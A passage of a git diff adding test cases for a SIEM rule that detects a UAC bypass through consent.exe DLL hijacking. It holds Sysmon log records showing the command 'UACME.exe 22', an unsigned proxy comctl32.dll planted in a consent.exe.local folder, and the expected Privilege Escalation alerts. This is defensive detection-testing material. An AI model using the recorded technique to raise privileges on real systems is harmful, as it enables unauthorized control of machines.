"system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC3D0", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-792d-5d45-0000-00107a250601", "object.process.hash.imphash": 
"522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "7472", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:13.760Z", "type": "raw", "uuid": "4358e286-1ee5-4521-af33-0ede7dac5ef4"} +{"action": "create", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"11\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"11\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:13.8183818Z\"},\"EventRecordID\":\"5438\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"PrivEsc - UAC Bypass UACME 22\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:13.721\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00104f190601}\"},{\"Name\":\"ProcessId\",\"text\":\"5336\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\explorer.exe\"},{\"Name\":\"TargetFilename\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\comctl32.dll\"},{\"Name\":\"CreationUtcTime\",\"text\":\"2019-08-03 12:08:13.721\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "PrivEsc - UAC Bypass UACME 22", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\users\\ieuser\\appdata\\local\\temp\\comctl32.dll", "object.name": "comctl32.dll", "object.path": 
"c:\\users\\ieuser\\appdata\\local\\temp\\", "object.property": "creation time", "object.value": "2019-08-03T12:08:13.721Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\explorer.exe", "subject.process.guid": "747f3d96-792d-5d45-0000-00104f190601", "subject.process.id": "5336", "subject.process.name": "explorer.exe", "subject.process.path": "c:\\windows\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:13.721Z", "type": "raw", "uuid": "114bdb77-3e56-4e56-91f1-c348231ab6e7"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:13.6360892Z\"},\"EventRecordID\":\"5437\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:13.624\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00104f190601}\"},{\"Name\":\"ProcessId\",\"text\":\"5336\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\UACME.exe\"},{\"Name\":\"FileVersion\",\"text\":\"3.1.9.1905\"},{\"Name\":\"Description\",\"text\":\"UACMe main module\"},{\"Name\":\"Product\",\"text\":\"UACMe\"},{\"Name\":\"Company\",\"text\":\"Hazardous Environments\"},{\"Name\":\"CommandLine\",\"text\":\"UACME.exe 
22\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020fbd31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3fb\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9E57914D39FBFE785C915E225011892613C4714C,MD5=D57E778DF10F801F47119A04BE990FFD,SHA256=D76815CE3F4B9FE7A611D6F536F65AF313E2AB2F8BB52EF0998487D89A6E7378,IMPHASH=B6789EDFE23DDA911AE37C87444D3DCB\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5a29-5d45-0000-0010deb99000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5780\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\" \"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020fbd31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "1627131", "object.process.cmdline": "UACME.exe 22", "object.process.cwd": "C:\\Users\\IEUser\\Desktop\\", "object.process.fullpath": "c:\\users\\ieuser\\desktop\\uacme.exe", 
"object.process.guid": "747f3d96-792d-5d45-0000-00104f190601", "object.process.hash.imphash": "B6789EDFE23DDA911AE37C87444D3DCB", "object.process.hash.md5": "D57E778DF10F801F47119A04BE990FFD", "object.process.hash.sha1": "9E57914D39FBFE785C915E225011892613C4714C", "object.process.hash.sha256": "D76815CE3F4B9FE7A611D6F536F65AF313E2AB2F8BB52EF0998487D89A6E7378", "object.process.id": "5336", "object.process.meta": "Description:UACMe main module | Product:UACMe | Company:Hazardous Environments", "object.process.name": "uacme.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.parent.guid": "747f3d96-5a29-5d45-0000-0010deb99000", "object.process.parent.id": "5780", "object.process.parent.name": "cmd.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\users\\ieuser\\desktop\\", "object.process.version": "3.1.9.1905", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "1627131", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:13.624Z", "type": "raw", "uuid": "a82cad3b-7c34-44ff-afea-535b46c1e49e"} -# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь -expect 2 {"correlation_name": "UAC_Bypass_Via_Consent"} \ No newline at end of file +expect 2 {"action": "start", "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Bypass User Account Control", "correlation_name": "UAC_Bypass_Via_Consent", "correlation_type": "event", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "PrivEsc - DLL Hijack - UACME 22", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "UAC_Bypass_Via_Consent|msedgewin10|consent.exe|c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\comctl32.dll", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "module", "object.process.fullpath": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\comctl32.dll", "object.process.hash.md5": "9E5AED3F57CEBC5154F9373B2BB9BA05", "object.process.hash.sha1": "A309A622B9D4A62CFE59B73FDD32BD8384E66628", "object.process.hash.sha256": "FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.meta": "Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous Environments", "object.process.name": "comctl32.dll", "object.process.path": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\", "object.property": "signature status", "object.value": "not signed", "status": "success", "subject": "process", "subject.account.domain": "nt authority", 
"subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.session_id": "999", "subject.process.cwd": "C:\\Windows\\system32\\", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "subject.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "subject.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "subject.process.name": "consent.exe", "subject.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "subject.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "subject.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "subject.process.parent.id": "896", "subject.process.parent.name": "svchost.exe", "subject.process.parent.path": "c:\\windows\\system32\\", "subject.process.path": "c:\\windows\\system32\\", "subject.process.version": "10.0.17763.1 (WinBuild.160101.0800)"} + \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_3.sc new file mode 100644 index 00000000..fbcb7478 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_3.sc 
@@ -0,0 +1,6 @@ +{"_checkpoint": 57615712018, "_meta": {"id": "01da0c7e-03b2-01ee-8c68-005056825a53", "time": "2023-06-05T15:02:22.4660000Z", "assetIds": ["1864e292-4880-0001-0000-000000000007"], "site_alias": "unknown site_id=null", "site_name": "unknown site_id=null", "site_address": "unknown site_id=null", "site_is_deleted": true}, "action": "start", "asset_ids": ["1864e292-4880-0001-0000-000000000007"], "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"7\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"7\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-05T15:02:22.480032900Z\"},\"EventRecordID\":\"800891\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"3144\",\"ThreadID\":\"984\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"wks05.example.com\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"text\":\"-\",\"Name\":\"RuleName\"},{\"text\":\"2023-06-05 15:02:22.466\",\"Name\":\"UtcTime\"},{\"text\":\"{20fff121-f8dd-647d-8401-000000003900}\",\"Name\":\"ProcessGuid\"},{\"text\":\"2328\",\"Name\":\"ProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\",\"Name\":\"Image\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\\\comctl32.dll\",\"Name\":\"ImageLoaded\"},{\"text\":\"3.1.8.1904\",\"Name\":\"FileVersion\"},{\"text\":\"UACMe proxy DLL\",\"Name\":\"Description\"},{\"text\":\"UACMe\",\"Name\":\"Product\"},{\"text\":\"Hazardous 
Environments\",\"Name\":\"Company\"},{\"text\":\"Ikazuchi.dll\",\"Name\":\"OriginalFileName\"},{\"text\":\"MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B\",\"Name\":\"Hashes\"},{\"text\":\"false\",\"Name\":\"Signed\"},{\"text\":\"-\",\"Name\":\"Signature\"},{\"text\":\"Unavailable\",\"Name\":\"SignatureStatus\"},{\"text\":\"NT AUTHORITY\\\\SYSTEM\",\"Name\":\"User\"}]}}}", "category.generic": "Executable Module", "category.high": "Availability Management", "category.low": "Control", "datafield10": "Ikazuchi.dll", "datafield2": "2328", "datafield3": "c:\\windows\\system32\\", "datafield4": "consent.exe", "datafield6": "Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous Environments", "datafield7": "20fff121-f8dd-647d-8401-000000003900", "event_src.asset": "1864e292-4880-0001-0000-000000000007", "event_src.category": "Other", "event_src.fqdn": "wks05.example.com", "event_src.host": "wks05.example.com", "event_src.hostname": "wks05", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2916", "historical": false, "id": "PT_Microsoft_Windows_eventlog_Sysmon_7_Image_loaded", "importance": "low", "incorrect_time": false, "input_id": "00000000-0000-0000-0000-000000000000", "job_id": "692db8c2-9d54-11eb-a8b3-0242ac130003", "mime": "application/x-pt-eventlog", "msgid": "7", "normalized": true, "object": "module", "object.account.provider": "local", "object.name": "comctl32.dll", "object.path": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\comctl32.dll", 
"object.process.hash": "IMPHASH:1C6B5C991BBBDC2B578EA7DEEF4AFA1B MD5:9E5AED3F57CEBC5154F9373B2BB9BA05 SHA256:FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.hash.imphash": "1C6B5C991BBBDC2B578EA7DEEF4AFA1B", "object.process.hash.md5": "9E5AED3F57CEBC5154F9373B2BB9BA05", "object.process.hash.sha256": "FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.meta": "Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous Environments", "object.process.name": "comctl32.dll", "object.process.original_name": "Ikazuchi.dll", "object.process.path": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\", "object.property": "signature status", "object.value": "not signed", "object.version": "3.1.8.1904", "origin_app_alias": "MP-1", "origin_app_id": "185957ea-0f40-0001-0000-000000000002", "primary_siem_app_alias": "MP-1", "primary_siem_app_id": "185957ea-0f40-0001-0000-000000000002", "recv_asset": "1864e292-4880-0001-0000-000000000007", "recv_host": "wks05", "recv_ipv4": "1.2.3.4", "remote": false, "scope_id": "00000000-0000-0000-0000-000000000005", "siem_alias": "1.2.3.4", "siem_id": "e944c6fa-4174-4bb7-afae-98b42faee6b2", "site_address": "unknown site_id=null", "site_alias": "unknown site_id=null", "site_name": "unknown site_id=null", "status": "success", "subject": "process", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.guid": "20fff121-f8dd-647d-8401-000000003900", "subject.process.id": "2328", "subject.process.name": "consent.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "wineventlog", "taxonomy_version": "26.0.215-release-26.0", "tenant_id": "00000000-0000-0000-0000-000000000000", "time": "2023-06-05T15:02:22.466Z", "uuid": 
"01da0c7e-03b2-01ee-8c68-005056825a53"} +{"_checkpoint": 57615712010, "_meta": {"id": "01da0c76-03b2-01ee-8c68-005056825a53", "time": "2023-06-05T15:01:49.2630000Z", "assetIds": ["1864e292-4880-0001-0000-000000000007"], "site_alias": "unknown site_id=null", "site_name": "unknown site_id=null", "site_address": "unknown site_id=null", "site_is_deleted": true}, "action": "start", "asset_ids": ["1864e292-4880-0001-0000-000000000007"], "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-05T15:01:49.265081800Z\"},\"EventRecordID\":\"800883\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"3144\",\"ThreadID\":\"984\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"wks05.example.com\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"text\":\"-\",\"Name\":\"RuleName\"},{\"text\":\"2023-06-05 15:01:49.263\",\"Name\":\"UtcTime\"},{\"text\":\"{20fff121-f8dd-647d-8401-000000003900}\",\"Name\":\"ProcessGuid\"},{\"text\":\"2328\",\"Name\":\"ProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\",\"Name\":\"Image\"},{\"text\":\"10.0.17763.3232 (WinBuild.160101.0800)\",\"Name\":\"FileVersion\"},{\"text\":\"Consent UI for administrative applications\",\"Name\":\"Description\"},{\"text\":\"Microsoft® Windows® Operating System\",\"Name\":\"Product\"},{\"text\":\"Microsoft Corporation\",\"Name\":\"Company\"},{\"text\":\"consent.exe\",\"Name\":\"OriginalFileName\"},{\"text\":\"consent.exe 368 272 00000285D6BE22C0\",\"Name\":\"CommandLine\"},{\"text\":\"C:\\\\Windows\\\\system32\\\\\",\"Name\":\"CurrentDirectory\"},{\"text\":\"NT 
AUTHORITY\\\\SYSTEM\",\"Name\":\"User\"},{\"text\":\"{20fff121-f3f7-647d-e703-000000000000}\",\"Name\":\"LogonGuid\"},{\"text\":\"0x3e7\",\"Name\":\"LogonId\"},{\"text\":\"1\",\"Name\":\"TerminalSessionId\"},{\"text\":\"System\",\"Name\":\"IntegrityLevel\"},{\"text\":\"MD5=C67713C28BB97E685FEB88FFAEB96788,SHA256=6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C,IMPHASH=1275A84E15AAA739F3099F6A73D7D6FA\",\"Name\":\"Hashes\"},{\"text\":\"{20fff121-f3f8-647d-1300-000000003900}\",\"Name\":\"ParentProcessGuid\"},{\"text\":\"368\",\"Name\":\"ParentProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"Name\":\"ParentImage\"},{\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p\",\"Name\":\"ParentCommandLine\"},{\"text\":\"NT AUTHORITY\\\\SYSTEM\",\"Name\":\"ParentUser\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield1": "999", "datafield10": "consent.exe", "datafield19": "consent.exe (2328) ← svchost.exe (368) ← services.exe (648) ← wininit.exe (520) ← smss.exe (408) ← smss.exe (324)", "datafield2": "368", "datafield3": "c:\\windows\\system32\\", "datafield4": "svchost.exe", "datafield5": "consent.exe 368 272 00000285D6BE22C0", "datafield6": "20fff121-f3f7-647d-e703-000000000000", "datafield7": "999", "datafield8": "20fff121-f8dd-647d-8401-000000003900", "datafield9": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p", "event_src.asset": "1864e292-4880-0001-0000-000000000007", "event_src.category": "Other", "event_src.fqdn": "wks05.example.com", "event_src.host": "wks05.example.com", "event_src.hostname": "wks05", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2916", "historical": false, "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "incorrect_time": false, "input_id": 
"00000000-0000-0000-0000-000000000000", "job_id": "692db8c2-9d54-11eb-a8b3-0242ac130003", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.provider": "local", "object.account.session_id": "999", "object.hash": "6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C", "object.id": "2328", "object.name": "consent.exe", "object.path": "c:\\windows\\system32\\", "object.process.chain": "consent.exe ← svchost.exe ← services.exe ← wininit.exe ← smss.exe ← smss.exe", "object.process.cmdline": "consent.exe 368 272 00000285D6BE22C0", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "20fff121-f8dd-647d-8401-000000003900", "object.process.hash": "IMPHASH:1275A84E15AAA739F3099F6A73D7D6FA MD5:C67713C28BB97E685FEB88FFAEB96788 SHA256:6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C", "object.process.hash.imphash": "1275A84E15AAA739F3099F6A73D7D6FA", "object.process.hash.md5": "C67713C28BB97E685FEB88FFAEB96788", "object.process.hash.sha256": "6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C", "object.process.id": "2328", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.original_name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "20fff121-f3f8-647d-1300-000000003900", "object.process.parent.id": "368", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", 
"object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.3232 (WinBuild.160101.0800)", "object.property": "metadata", "object.value": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.version": "10.0.17763.3232 (WinBuild.160101.0800)", "origin_app_alias": "MP-1", "origin_app_id": "185957ea-0f40-0001-0000-000000000002", "primary_siem_app_alias": "MP-1", "primary_siem_app_id": "185957ea-0f40-0001-0000-000000000002", "recv_asset": "1864e292-4880-0001-0000-000000000007", "recv_host": "wks05", "recv_ipv4": "1.2.3.4", "remote": false, "scope_id": "00000000-0000-0000-0000-000000000005", "siem_alias": "1.2.3.4", "siem_id": "e944c6fa-4174-4bb7-afae-98b42faee6b2", "site_address": "unknown site_id=null", "site_alias": "unknown site_id=null", "site_name": "unknown site_id=null", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "subject.domain": "nt authority", "subject.name": "system", "subject.state": "on behalf of oneself", "tag": "wineventlog", "taxonomy_version": "26.0.215-release-26.0", "tenant_id": "00000000-0000-0000-0000-000000000000", "time": "2023-06-05T15:01:49.263Z", "uuid": "01da0c76-03b2-01ee-8c68-005056825a53"}
+
+# Тут будет твой тест.
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь
+expect 1 {"action": "start", "alert.key": "consent.exe|c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\comctl32.dll", "asset_ids": ["1864e292-4880-0001-0000-000000000007"], "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Bypass User Account Control", "correlation_name": "UAC_Bypass_Via_Consent", "correlation_type": "event", "datafield6": "20fff121-f3f7-647d-e703-000000000000", "event_src.asset": "1864e292-4880-0001-0000-000000000007", "event_src.category": "Other", "event_src.fqdn": "wks05.example.com", "event_src.host": "wks05.example.com", "event_src.hostname": "wks05", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "UAC_Bypass_Via_Consent|wks05.example.com|consent.exe|c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\comctl32.dll", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "module", "object.process.fullpath": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\comctl32.dll", "object.process.hash": "IMPHASH:1C6B5C991BBBDC2B578EA7DEEF4AFA1B MD5:9E5AED3F57CEBC5154F9373B2BB9BA05 SHA256:FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.hash.md5": "9E5AED3F57CEBC5154F9373B2BB9BA05", "object.process.hash.sha256": "FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.meta": "Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous Environments", "object.process.name": "comctl32.dll", "object.process.original_name": 
"Ikazuchi.dll", "object.process.path": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\", "object.property": "signature status", "object.value": "not signed", "status": "success", "subject": "process", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.session_id": "999", "subject.process.chain": "consent.exe ← svchost.exe ← services.exe ← wininit.exe ← smss.exe ← smss.exe", "subject.process.cmdline": "consent.exe 368 272 00000285D6BE22C0", "subject.process.cwd": "C:\\Windows\\system32\\", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.guid": "20fff121-f8dd-647d-8401-000000003900", "subject.process.hash": "IMPHASH:1275A84E15AAA739F3099F6A73D7D6FA MD5:C67713C28BB97E685FEB88FFAEB96788 SHA256:6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C", "subject.process.hash.md5": "C67713C28BB97E685FEB88FFAEB96788", "subject.process.hash.sha256": "6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C", "subject.process.id": "2328", "subject.process.meta": "Description:Consent UI for administrative applications | 